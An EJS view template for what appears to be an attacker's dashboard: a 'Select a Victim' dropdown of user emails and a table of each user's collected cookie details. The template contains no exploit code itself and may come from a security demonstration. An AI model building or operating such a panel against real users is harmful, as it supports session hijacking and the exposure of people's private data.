<% include ./partials/header %>
<% include ./partials/navBar %>
<body>
<div class="container-fluid">
	<div class="table-responsive panel-body">
		<form action="/cookies" method="GET" class="form-inline">
			<div class="form-group">
				<select name="selection" id="victimSelection" class="form-control">
					<option selected>Select a Victim</option>
					<% for (var result in users){ %>
					<option value="<%=users[result]['userID']%>"><%=users[result]['email']%></option>
					<% } %>
				</select>
				<span>&nbsp</span>
			</div>
			<button type="submit" class="btn btn-default">Submit</button>
		</form>
		<h2> Cookies </h2>
		<table class="table table-hover table-striped">
			<thead class="thead-light">
				<th>UserID</th>
				<th>details</th>
			</thead>
			<%for (var result in rowData){%>
			<tr>
			  <td><%=rowData[result]['userID']%></td>
				<td><%=rowData[result]['details']%></td>
			  <%}%>
			</tr>
		</table>
		<br>
	</div>
</div>
</body>
<% include ./partials/footer %>
